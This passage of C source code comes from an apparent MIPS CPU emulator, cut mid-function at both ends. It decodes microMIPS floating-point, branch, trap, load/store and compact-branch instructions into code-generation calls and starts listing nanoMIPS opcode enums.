pool32f_invalid; } break; case MAXA_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: gen_farith(ctx, OPC_MAXA_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MAXA_D, rt, rs, rd, 0); break; default: goto pool32f_invalid; } break; case 0x30: /* regular FP ops */ switch ((ctx->opcode >> 6) & 0x3) { case ADD_FMT: FINSN_3ARG_SDPS(ADD); break; case SUB_FMT: FINSN_3ARG_SDPS(SUB); break; case MUL_FMT: FINSN_3ARG_SDPS(MUL); break; case DIV_FMT: fmt = (ctx->opcode >> 8) & 0x3; if (fmt == 1) { mips32_op = OPC_DIV_D; } else if (fmt == 0) { mips32_op = OPC_DIV_S; } else { goto pool32f_invalid; } goto do_fpop; default: goto pool32f_invalid; } break; case 0x38: /* cmovs */ switch ((ctx->opcode >> 6) & 0x7) { case MOVN_FMT: /* SELEQZ_FMT */ if (ctx->insn_flags & ISA_MIPS32R6) { /* SELEQZ_FMT */ switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: gen_sel_s(ctx, OPC_SELEQZ_S, rd, rt, rs); break; case FMT_SDPS_D: gen_sel_d(ctx, OPC_SELEQZ_D, rd, rt, rs); break; default: goto pool32f_invalid; } } else { /* MOVN_FMT */ FINSN_3ARG_SDPS(MOVN); } break; case MOVN_FMT_04: check_insn_opc_removed(ctx, ISA_MIPS32R6); FINSN_3ARG_SDPS(MOVN); break; case MOVZ_FMT: /* SELNEZ_FMT */ if (ctx->insn_flags & ISA_MIPS32R6) { /* SELNEZ_FMT */ switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: gen_sel_s(ctx, OPC_SELNEZ_S, rd, rt, rs); break; case FMT_SDPS_D: gen_sel_d(ctx, OPC_SELNEZ_D, rd, rt, rs); break; default: goto pool32f_invalid; } } else { /* MOVZ_FMT */ FINSN_3ARG_SDPS(MOVZ); } break; case MOVZ_FMT_05: check_insn_opc_removed(ctx, ISA_MIPS32R6); FINSN_3ARG_SDPS(MOVZ); break; case SEL_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: gen_sel_s(ctx, OPC_SEL_S, rd, rt, rs); break; case FMT_SDPS_D: gen_sel_d(ctx, OPC_SEL_D, rd, rt, rs); break; default: goto pool32f_invalid; } break; case MADDF_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: mips32_op = OPC_MADDF_S; goto do_fpop; case FMT_SDPS_D: mips32_op = OPC_MADDF_D; goto do_fpop; default: goto pool32f_invalid; } break; case MSUBF_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: mips32_op = OPC_MSUBF_S; goto do_fpop; case FMT_SDPS_D: mips32_op = OPC_MSUBF_D; goto do_fpop; default: goto pool32f_invalid; } break; default: goto pool32f_invalid; } break; do_fpop: gen_farith(ctx, mips32_op, rt, rs, rd, 0); break; default: pool32f_invalid: MIPS_INVAL("pool32f"); generate_exception_end(ctx, EXCP_RI); break; } } else { generate_exception_err(ctx, EXCP_CpU, 1); } break; case POOL32I: minor = (ctx->opcode >> 21) & 0x1f; switch (minor) { case BLTZ: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BLTZ, 4, rs, -1, imm << 1, 4); break; case BLTZAL: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BLTZAL, 4, rs, -1, imm << 1, 4); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case BLTZALS: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BLTZAL, 4, rs, -1, imm << 1, 2); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case BGEZ: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BGEZ, 4, rs, -1, imm << 1, 4); break; case BGEZAL: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BGEZAL, 4, rs, -1, imm << 1, 4); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case BGEZALS: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BGEZAL, 4, rs, -1, imm << 1, 2); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case BLEZ: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BLEZ, 4, rs, -1, imm << 1, 4); break; case BGTZ: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_BGTZ, 4, rs, -1, imm << 1, 4); break; /* Traps */ case TLTI: /* BC1EQZC */ if (ctx->insn_flags & ISA_MIPS32R6) { /* BC1EQZC */ check_cp1_enabled(ctx); gen_compute_branch1_r6(ctx, OPC_BC1EQZ, rs, imm << 1, 0); } else { /* TLTI */ mips32_op = OPC_TLTI; goto do_trapi; } break; case TGEI: /* BC1NEZC */ if (ctx->insn_flags & ISA_MIPS32R6) { /* BC1NEZC */ check_cp1_enabled(ctx); gen_compute_branch1_r6(ctx, OPC_BC1NEZ, rs, imm << 1, 0); } else { /* TGEI */ mips32_op = OPC_TGEI; goto do_trapi; } break; case TLTIU: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_TLTIU; goto do_trapi; case TGEIU: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_TGEIU; goto do_trapi; case TNEI: /* SYNCI */ if (ctx->insn_flags & ISA_MIPS32R6) { /* SYNCI */ /* * Break the TB to be able to sync copied instructions * immediately. */ ctx->base.is_jmp = DISAS_STOP; } else { /* TNEI */ mips32_op = OPC_TNEI; goto do_trapi; } break; case TEQI: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_TEQI; do_trapi: gen_trap(ctx, mips32_op, rs, -1, imm); break; case BNEZC: case BEQZC: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, minor == BNEZC ? OPC_BNE : OPC_BEQ, 4, rs, 0, imm << 1, 0); /* * Compact branches don't have a delay slot, so just let * the normal delay slot handling take us to the branch * target. */ break; case LUI: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_logic_imm(ctx, OPC_LUI, rs, 0, imm); break; case SYNCI: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* * Break the TB to be able to sync copied instructions * immediately. */ ctx->base.is_jmp = DISAS_STOP; break; case BC2F: case BC2T: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* COP2: Not implemented. */ generate_exception_err(ctx, EXCP_CpU, 2); break; case BC1F: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = (ctx->opcode & (1 << 16)) ? OPC_BC1FANY2 : OPC_BC1F; goto do_cp1branch; case BC1T: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = (ctx->opcode & (1 << 16)) ? OPC_BC1TANY2 : OPC_BC1T; goto do_cp1branch; case BC1ANY4F: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_BC1FANY4; goto do_cp1mips3d; case BC1ANY4T: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_BC1TANY4; do_cp1mips3d: check_cop1x(ctx); check_insn(ctx, ASE_MIPS3D); /* Fall through */ do_cp1branch: if (env->CP0_Config1 & (1 << CP0C1_FP)) { check_cp1_enabled(ctx); gen_compute_branch1(ctx, mips32_op, (ctx->opcode >> 18) & 0x7, imm << 1); } else { generate_exception_err(ctx, EXCP_CpU, 1); } break; case BPOSGE64: case BPOSGE32: /* MIPS DSP: not implemented */ /* Fall through */ default: MIPS_INVAL("pool32i"); generate_exception_end(ctx, EXCP_RI); break; } break; case POOL32C: minor = (ctx->opcode >> 12) & 0xf; offset = sextract32(ctx->opcode, 0, (ctx->insn_flags & ISA_MIPS32R6) ? 9 : 12); switch (minor) { case LWL: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LWL; goto do_ld_lr; case SWL: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SWL; goto do_st_lr; case LWR: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LWR; goto do_ld_lr; case SWR: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SWR; goto do_st_lr; #if defined(TARGET_MIPS64) case LDL: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LDL; goto do_ld_lr; case SDL: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SDL; goto do_st_lr; case LDR: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LDR; goto do_ld_lr; case SDR: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SDR; goto do_st_lr; case LWU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); mips32_op = OPC_LWU; goto do_ld_lr; case LLD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); mips32_op = OPC_LLD; goto do_ld_lr; #endif case LL: mips32_op = OPC_LL; goto do_ld_lr; do_ld_lr: gen_ld(ctx, mips32_op, rt, rs, offset); break; do_st_lr: gen_st(ctx, mips32_op, rt, rs, offset); break; case SC: gen_st_cond(ctx, rt, rs, offset, MO_TESL, false); break; #if defined(TARGET_MIPS64) case SCD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_st_cond(ctx, rt, rs, offset, MO_TEQ, false); break; #endif case LD_EVA: if (!ctx->eva) { MIPS_INVAL("pool32c ld-eva"); generate_exception_end(ctx, EXCP_RI); break; } check_cp0_enabled(ctx); minor2 = (ctx->opcode >> 9) & 0x7; offset = sextract32(ctx->opcode, 0, 9); switch (minor2) { case LBUE: mips32_op = OPC_LBUE; goto do_ld_lr; case LHUE: mips32_op = OPC_LHUE; goto do_ld_lr; case LWLE: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LWLE; goto do_ld_lr; case LWRE: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LWRE; goto do_ld_lr; case LBE: mips32_op = OPC_LBE; goto do_ld_lr; case LHE: mips32_op = OPC_LHE; goto do_ld_lr; case LLE: mips32_op = OPC_LLE; goto do_ld_lr; case LWE: mips32_op = OPC_LWE; goto do_ld_lr; }; break; case ST_EVA: if (!ctx->eva) { MIPS_INVAL("pool32c st-eva"); generate_exception_end(ctx, EXCP_RI); break; } check_cp0_enabled(ctx); minor2 = (ctx->opcode >> 9) & 0x7; offset = sextract32(ctx->opcode, 0, 9); switch (minor2) { case SWLE: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SWLE; goto do_st_lr; case SWRE: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SWRE; goto do_st_lr; case PREFE: /* Treat as no-op */ if ((ctx->insn_flags & ISA_MIPS32R6) && (rt >= 24)) { /* hint codes 24-31 are reserved and signal RI */ generate_exception(ctx, EXCP_RI); } break; case CACHEE: /* Treat as no-op */ if (ctx->hflags & MIPS_HFLAG_ITC_CACHE) { gen_cache_operation(ctx, rt, rs, offset); } break; case SBE: mips32_op = OPC_SBE; goto do_st_lr; case SHE: mips32_op = OPC_SHE; goto do_st_lr; case SCE: gen_st_cond(ctx, rt, rs, offset, MO_TESL, true); break; case SWE: mips32_op = OPC_SWE; goto do_st_lr; }; break; case PREF: /* Treat as no-op */ if ((ctx->insn_flags & ISA_MIPS32R6) && (rt >= 24)) { /* hint codes 24-31 are reserved and signal RI */ generate_exception(ctx, EXCP_RI); } break; default: MIPS_INVAL("pool32c"); generate_exception_end(ctx, EXCP_RI); break; } break; case ADDI32: /* AUI, LUI */ if (ctx->insn_flags & ISA_MIPS32R6) { /* AUI, LUI */ gen_logic_imm(ctx, OPC_LUI, rt, rs, imm); } else { /* ADDI32 */ mips32_op = OPC_ADDI; goto do_addi; } break; case ADDIU32: mips32_op = OPC_ADDIU; do_addi: gen_arith_imm(ctx, mips32_op, rt, rs, imm); break; /* Logical operations */ case ORI32: mips32_op = OPC_ORI; goto do_logici; case XORI32: mips32_op = OPC_XORI; goto do_logici; case ANDI32: mips32_op = OPC_ANDI; do_logici: gen_logic_imm(ctx, mips32_op, rt, rs, imm); break; /* Set less than immediate */ case SLTI32: mips32_op = OPC_SLTI; goto do_slti; case SLTIU32: mips32_op = OPC_SLTIU; do_slti: gen_slt_imm(ctx, mips32_op, rt, rs, imm); break; case JALX32: check_insn_opc_removed(ctx, ISA_MIPS32R6); offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 2; gen_compute_branch(ctx, OPC_JALX, 4, rt, rs, offset, 4); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case JALS32: /* BOVC, BEQC, BEQZALC */ if (ctx->insn_flags & ISA_MIPS32R6) { if (rs >= rt) { /* BOVC */ mips32_op = OPC_BOVC; } else if (rs < rt && rs == 0) { /* BEQZALC */ mips32_op = OPC_BEQZALC; } else { /* BEQC */ mips32_op = OPC_BEQC; } gen_compute_compact_branch(ctx, mips32_op, rs, rt, imm << 1); } else { /* JALS32 */ offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 1; gen_compute_branch(ctx, OPC_JAL, 4, rt, rs, offset, 2); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; } break; case BEQ32: /* BC */ if (ctx->insn_flags & ISA_MIPS32R6) { /* BC */ gen_compute_compact_branch(ctx, OPC_BC, 0, 0, sextract32(ctx->opcode << 1, 0, 27)); } else { /* BEQ32 */ gen_compute_branch(ctx, OPC_BEQ, 4, rt, rs, imm << 1, 4); } break; case BNE32: /* BALC */ if (ctx->insn_flags & ISA_MIPS32R6) { /* BALC */ gen_compute_compact_branch(ctx, OPC_BALC, 0, 0, sextract32(ctx->opcode << 1, 0, 27)); } else { /* BNE32 */ gen_compute_branch(ctx, OPC_BNE, 4, rt, rs, imm << 1, 4); } break; case J32: /* BGTZC, BLTZC, BLTC */ if (ctx->insn_flags & ISA_MIPS32R6) { if (rs == 0 && rt != 0) { /* BGTZC */ mips32_op = OPC_BGTZC; } else if (rs != 0 && rt != 0 && rs == rt) { /* BLTZC */ mips32_op = OPC_BLTZC; } else { /* BLTC */ mips32_op = OPC_BLTC; } gen_compute_compact_branch(ctx, mips32_op, rs, rt, imm << 1); } else { /* J32 */ gen_compute_branch(ctx, OPC_J, 4, rt, rs, (int32_t)(ctx->opcode & 0x3FFFFFF) << 1, 4); } break; case JAL32: /* BLEZC, BGEZC, BGEC */ if (ctx->insn_flags & ISA_MIPS32R6) { if (rs == 0 && rt != 0) { /* BLEZC */ mips32_op = OPC_BLEZC; } else if (rs != 0 && rt != 0 && rs == rt) { /* BGEZC */ mips32_op = OPC_BGEZC; } else { /* BGEC */ mips32_op = OPC_BGEC; } gen_compute_compact_branch(ctx, mips32_op, rs, rt, imm << 1); } else { /* JAL32 */ gen_compute_branch(ctx, OPC_JAL, 4, rt, rs, (int32_t)(ctx->opcode & 0x3FFFFFF) << 1, 4); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; } break; /* Floating point (COP1) */ case LWC132: mips32_op = OPC_LWC1; goto do_cop1; case LDC132: mips32_op = OPC_LDC1; goto do_cop1; case SWC132: mips32_op = OPC_SWC1; goto do_cop1; case SDC132: mips32_op = OPC_SDC1; do_cop1: gen_cop1_ldst(ctx, mips32_op, rt, rs, imm); break; case ADDIUPC: /* PCREL: ADDIUPC, AUIPC, ALUIPC, LWPC */ if (ctx->insn_flags & ISA_MIPS32R6) { /* PCREL: ADDIUPC, AUIPC, ALUIPC, LWPC */ switch ((ctx->opcode >> 16) & 0x1f) { case ADDIUPC_00: case ADDIUPC_01: case ADDIUPC_02: case ADDIUPC_03: case ADDIUPC_04: case ADDIUPC_05: case ADDIUPC_06: case ADDIUPC_07: gen_pcrel(ctx, OPC_ADDIUPC, ctx->base.pc_next & ~0x3, rt); break; case AUIPC: gen_pcrel(ctx, OPC_AUIPC, ctx->base.pc_next, rt); break; case ALUIPC: gen_pcrel(ctx, OPC_ALUIPC, ctx->base.pc_next, rt); break; case LWPC_08: case LWPC_09: case LWPC_0A: case LWPC_0B: case LWPC_0C: case LWPC_0D: case LWPC_0E: case LWPC_0F: gen_pcrel(ctx, R6_OPC_LWPC, ctx->base.pc_next & ~0x3, rt); break; default: generate_exception(ctx, EXCP_RI); break; } } else { /* ADDIUPC */ int reg = mmreg(ZIMM(ctx->opcode, 23, 3)); offset = SIMM(ctx->opcode, 0, 23) << 2; gen_addiupc(ctx, reg, offset, 0, 0); } break; case BNVC: /* BNEC, BNEZALC */ check_insn(ctx, ISA_MIPS32R6); if (rs >= rt) { /* BNVC */ mips32_op = OPC_BNVC; } else if (rs < rt && rs == 0) { /* BNEZALC */ mips32_op = OPC_BNEZALC; } else { /* BNEC */ mips32_op = OPC_BNEC; } gen_compute_compact_branch(ctx, mips32_op, rs, rt, imm << 1); break; case R6_BNEZC: /* JIALC */ check_insn(ctx, ISA_MIPS32R6); if (rt != 0) { /* BNEZC */ gen_compute_compact_branch(ctx, OPC_BNEZC, rt, 0, sextract32(ctx->opcode << 1, 0, 22)); } else { /* JIALC */ gen_compute_compact_branch(ctx, OPC_JIALC, 0, rs, imm); } break; case R6_BEQZC: /* JIC */ check_insn(ctx, ISA_MIPS32R6); if (rt != 0) { /* BEQZC */ gen_compute_compact_branch(ctx, OPC_BEQZC, rt, 0, sextract32(ctx->opcode << 1, 0, 22)); } else { /* JIC */ gen_compute_compact_branch(ctx, OPC_JIC, 0, rs, imm); } break; case BLEZALC: /* BGEZALC, BGEUC */ check_insn(ctx, ISA_MIPS32R6); if (rs == 0 && rt != 0) { /* BLEZALC */ mips32_op = OPC_BLEZALC; } else if (rs != 0 && rt != 0 && rs == rt) { /* BGEZALC */ mips32_op = OPC_BGEZALC; } else { /* BGEUC */ mips32_op = OPC_BGEUC; } gen_compute_compact_branch(ctx, mips32_op, rs, rt, imm << 1); break; case BGTZALC: /* BLTZALC, BLTUC */ check_insn(ctx, ISA_MIPS32R6); if (rs == 0 && rt != 0) { /* BGTZALC */ mips32_op = OPC_BGTZALC; } else if (rs != 0 && rt != 0 && rs == rt) { /* BLTZALC */ mips32_op = OPC_BLTZALC; } else { /* BLTUC */ mips32_op = OPC_BLTUC; } gen_compute_compact_branch(ctx, mips32_op, rs, rt, imm << 1); break; /* Loads and stores */ case LB32: mips32_op = OPC_LB; goto do_ld; case LBU32: mips32_op = OPC_LBU; goto do_ld; case LH32: mips32_op = OPC_LH; goto do_ld; case LHU32: mips32_op = OPC_LHU; goto do_ld; case LW32: mips32_op = OPC_LW; goto do_ld; #ifdef TARGET_MIPS64 case LD32: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); mips32_op = OPC_LD; goto do_ld; case SD32: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); mips32_op = OPC_SD; goto do_st; #endif case SB32: mips32_op = OPC_SB; goto do_st; case SH32: mips32_op = OPC_SH; goto do_st; case SW32: mips32_op = OPC_SW; goto do_st; do_ld: gen_ld(ctx, mips32_op, rt, rs, imm); break; do_st: gen_st(ctx, mips32_op, rt, rs, imm); break; default: generate_exception_end(ctx, EXCP_RI); break; } } static int decode_micromips_opc(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op; /* make sure instructions are on a halfword boundary */ if (ctx->base.pc_next & 0x1) { env->CP0_BadVAddr = ctx->base.pc_next; generate_exception_end(ctx, EXCP_AdEL); return 2; } op = (ctx->opcode >> 10) & 0x3f; /* Enforce properly-sized instructions in a delay slot */ if (ctx->hflags & MIPS_HFLAG_BDS_STRICT) { switch (op & 0x7) { /* MSB-3..MSB-5 */ case 0: /* POOL32A, POOL32B, POOL32I, POOL32C */ case 4: /* ADDI32, ADDIU32, ORI32, XORI32, SLTI32, SLTIU32, ANDI32, JALX32 */ case 5: /* LBU32, LHU32, POOL32F, JALS32, BEQ32, BNE32, J32, JAL32 */ case 6: /* SB32, SH32, ADDIUPC, SWC132, SDC132, SW32 */ case 7: /* LB32, LH32, LWC132, LDC132, LW32 */ if (ctx->hflags & MIPS_HFLAG_BDS16) { generate_exception_end(ctx, EXCP_RI); return 2; } break; case 1: /* POOL16A, POOL16B, POOL16C, LWGP16, POOL16F */ case 2: /* LBU16, LHU16, LWSP16, LW16, SB16, SH16, SWSP16, SW16 */ case 3: /* MOVE16, ANDI16, POOL16D, POOL16E, BEQZ16, BNEZ16, B16, LI16 */ if (ctx->hflags & MIPS_HFLAG_BDS32) { generate_exception_end(ctx, EXCP_RI); return 2; } break; } } switch (op) { case POOL16A: { int rd = mmreg(uMIPS_RD(ctx->opcode)); int rs1 = mmreg(uMIPS_RS1(ctx->opcode)); int rs2 = mmreg(uMIPS_RS2(ctx->opcode)); uint32_t opc = 0; switch (ctx->opcode & 0x1) { case ADDU16: opc = OPC_ADDU; break; case SUBU16: opc = OPC_SUBU; break; } if (ctx->insn_flags & ISA_MIPS32R6) { /* * In the Release 6, the register number location in * the instruction encoding has changed. */ gen_arith(ctx, opc, rs1, rd, rs2); } else { gen_arith(ctx, opc, rd, rs1, rs2); } } break; case POOL16B: { int rd = mmreg(uMIPS_RD(ctx->opcode)); int rs = mmreg(uMIPS_RS(ctx->opcode)); int amount = (ctx->opcode >> 1) & 0x7; uint32_t opc = 0; amount = amount == 0 ? 8 : amount; switch (ctx->opcode & 0x1) { case SLL16: opc = OPC_SLL; break; case SRL16: opc = OPC_SRL; break; } gen_shift_imm(ctx, opc, rd, rs, amount); } break; case POOL16C: if (ctx->insn_flags & ISA_MIPS32R6) { gen_pool16c_r6_insn(ctx); } else { gen_pool16c_insn(ctx); } break; case LWGP16: { int rd = mmreg(uMIPS_RD(ctx->opcode)); int rb = 28; /* GP */ int16_t offset = SIMM(ctx->opcode, 0, 7) << 2; gen_ld(ctx, OPC_LW, rd, rb, offset); } break; case POOL16F: check_insn_opc_removed(ctx, ISA_MIPS32R6); if (ctx->opcode & 1) { generate_exception_end(ctx, EXCP_RI); } else { /* MOVEP */ int enc_dest = uMIPS_RD(ctx->opcode); int enc_rt = uMIPS_RS2(ctx->opcode); int enc_rs = uMIPS_RS1(ctx->opcode); gen_movep(ctx, enc_dest, enc_rt, enc_rs); } break; case LBU16: { int rd = mmreg(uMIPS_RD(ctx->opcode)); int rb = mmreg(uMIPS_RS(ctx->opcode)); int16_t offset = ZIMM(ctx->opcode, 0, 4); offset = (offset == 0xf ? -1 : offset); gen_ld(ctx, OPC_LBU, rd, rb, offset); } break; case LHU16: { int rd = mmreg(uMIPS_RD(ctx->opcode)); int rb = mmreg(uMIPS_RS(ctx->opcode)); int16_t offset = ZIMM(ctx->opcode, 0, 4) << 1; gen_ld(ctx, OPC_LHU, rd, rb, offset); } break; case LWSP16: { int rd = (ctx->opcode >> 5) & 0x1f; int rb = 29; /* SP */ int16_t offset = ZIMM(ctx->opcode, 0, 5) << 2; gen_ld(ctx, OPC_LW, rd, rb, offset); } break; case LW16: { int rd = mmreg(uMIPS_RD(ctx->opcode)); int rb = mmreg(uMIPS_RS(ctx->opcode)); int16_t offset = ZIMM(ctx->opcode, 0, 4) << 2; gen_ld(ctx, OPC_LW, rd, rb, offset); } break; case SB16: { int rd = mmreg2(uMIPS_RD(ctx->opcode)); int rb = mmreg(uMIPS_RS(ctx->opcode)); int16_t offset = ZIMM(ctx->opcode, 0, 4); gen_st(ctx, OPC_SB, rd, rb, offset); } break; case SH16: { int rd = mmreg2(uMIPS_RD(ctx->opcode)); int rb = mmreg(uMIPS_RS(ctx->opcode)); int16_t offset = ZIMM(ctx->opcode, 0, 4) << 1; gen_st(ctx, OPC_SH, rd, rb, offset); } break; case SWSP16: { int rd = (ctx->opcode >> 5) & 0x1f; int rb = 29; /* SP */ int16_t offset = ZIMM(ctx->opcode, 0, 5) << 2; gen_st(ctx, OPC_SW, rd, rb, offset); } break; case SW16: { int rd = mmreg2(uMIPS_RD(ctx->opcode)); int rb = mmreg(uMIPS_RS(ctx->opcode)); int16_t offset = ZIMM(ctx->opcode, 0, 4) << 2; gen_st(ctx, OPC_SW, rd, rb, offset); } break; case MOVE16: { int rd = uMIPS_RD5(ctx->opcode); int rs = uMIPS_RS5(ctx->opcode); gen_arith(ctx, OPC_ADDU, rd, rs, 0); } break; case ANDI16: gen_andi16(ctx); break; case POOL16D: switch (ctx->opcode & 0x1) { case ADDIUS5: gen_addius5(ctx); break; case ADDIUSP: gen_addiusp(ctx); break; } break; case POOL16E: switch (ctx->opcode & 0x1) { case ADDIUR2: gen_addiur2(ctx); break; case ADDIUR1SP: gen_addiur1sp(ctx); break; } break; case B16: /* BC16 */ gen_compute_branch(ctx, OPC_BEQ, 2, 0, 0, sextract32(ctx->opcode, 0, 10) << 1, (ctx->insn_flags & ISA_MIPS32R6) ? 0 : 4); break; case BNEZ16: /* BNEZC16 */ case BEQZ16: /* BEQZC16 */ gen_compute_branch(ctx, op == BNEZ16 ? OPC_BNE : OPC_BEQ, 2, mmreg(uMIPS_RD(ctx->opcode)), 0, sextract32(ctx->opcode, 0, 7) << 1, (ctx->insn_flags & ISA_MIPS32R6) ? 0 : 4); break; case LI16: { int reg = mmreg(uMIPS_RD(ctx->opcode)); int imm = ZIMM(ctx->opcode, 0, 7); imm = (imm == 0x7f ? -1 : imm); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], imm); } break; case RES_29: case RES_31: case RES_39: generate_exception_end(ctx, EXCP_RI); break; default: decode_micromips32_opc(env, ctx); return 4; } return 2; } /* * * nanoMIPS opcodes * */ /* MAJOR, P16, and P32 pools opcodes */ enum { NM_P_ADDIU = 0x00, NM_ADDIUPC = 0x01, NM_MOVE_BALC = 0x02, NM_P16_MV = 0x04, NM_LW16 = 0x05, NM_BC16 = 0x06, NM_P16_SR = 0x07, NM_POOL32A = 0x08, NM_P_BAL = 0x0a, NM_P16_SHIFT = 0x0c, NM_LWSP16 = 0x0d, NM_BALC16 = 0x0e, NM_P16_4X4 = 0x0f, NM_P_GP_W = 0x10, NM_P_GP_BH = 0x11, NM_P_J = 0x12, NM_P16C = 0x14, NM_LWGP16 = 0x15, NM_P16_LB = 0x17, NM_P48I = 0x18, NM_P16_A1 = 0x1c, NM_LW4X4 = 0x1d, NM_P16_LH = 0x1f, NM_P_U12 = 0x20, NM_P_LS_U12 = 0x21, NM_P_BR1 = 0x22, NM_P16_A2 = 0x24, NM_SW16 = 0x25, NM_BEQZC16 = 0x26, NM_POOL32F = 0x28, NM_P_LS_S9 = 0x29, NM_P_BR2 = 0x2a, NM_P16_ADDU = 0x2c, NM_SWSP16 = 0x2d, NM_BNEZC16 = 0x2e, NM_MOVEP = 0x2f, NM_POOL32S = 0x30, NM_P_BRI = 0x32, NM_LI16 = 0x34, NM_SWGP16 = 0x35, NM_P16_BR = 0x36, NM_P_LUI = 0x38, NM_ANDI16 = 0x3c, NM_SW4X4 = 0x3d, NM_MOVEPREV = 0x3f, }; /* POOL32A instruction pool */ enum { NM_POOL32A0 = 0x00, NM_SPECIAL2 = 0x01, NM_COP2_1 = 0x02, NM_UDI = 0x03, NM_POOL32A5 = 0x05, NM_POOL32A7 = 0x07, }; /* P.GP.W instruction pool */ enum { NM_ADDIUGP_W = 0x00, NM_LWGP = 0x02, NM_SWGP = 0x03, }; /* P48I instruction pool */ enum { NM_LI48 = 0x00, NM_ADDIU48 = 0x01, NM_ADDIUGP48 = 0x02, NM_ADDIUPC48 = 0x03, NM_LWPC48 = 0x0b, NM_SWPC48 = 0x0f, }; /* P.U12 instruction pool */ enum { NM_ORI = 0x00, NM_XORI = 0x01, NM_ANDI = 0x02, NM_P_SR = 0x03, NM_SLTI = 0x04, NM_SLTIU = 0x05, NM_SEQI = 0x06, NM_ADDIUNEG = 0x08, NM_P_SHIFT = 0x0c, NM_P_ROTX = 0x0d, NM_P_INS = 0x0e, NM_P_EXT = 0x0f, }; /* POOL32F instruction pool */ enum { NM_POOL32F_0 = 0x00, NM_POOL32F_3 = 0x03, NM_POOL32F_5 = 0x05, }; /* POOL32S instruction pool */ enum { NM_POOL32S_0 = 0x00, NM_POOL32S_4 = 0x04, }; /* P.LUI instruction pool */ enum { NM_LUI = 0x00, NM_ALUIPC = 0x01, }; /* P.GP.BH instruction pool */ enum { NM_LBGP = 0x00, NM_SBGP = 0x01, NM_LBUGP = 0x02, NM_ADDIUGP_B = 0x03, NM_P_GP_LH = 0x04, NM_P_GP_SH = 0x05, NM_P_GP_CP1 = 0x06, }; /* P.LS.U12 instruction pool */ enum { NM_LB = 0x00, NM_SB = 0x01, NM_LBU = 0x02, NM_P_PREFU12 = 0x03, NM_LH = 0x04, NM_SH = 0x05, NM_LHU = 0x06, NM_LWU = 0x07, NM_LW = 0x08, NM_SW = 0x09, NM_LWC1 = 0x0a, NM_SWC1 = 0x0b, NM_LDC1 = 0x0e, NM_SDC1 = 0x0f, }; /* P.LS.S9 instruction pool */ enum { NM_P_LS_S0 = 0x00, NM_P_LS_S1 = 0x01, NM_P_LS_E0 = 0x02, NM_P_LS_WM = 0x04, NM_P_LS_UAWM = 0x05, }; /* P.BAL instruction pool */ enum { NM_BC = 0x00, NM_BALC = 0x01, }; /* P.J instruction pool */ enum { NM_JALRC = 0x00, NM_JALRC_HB = 0x01, 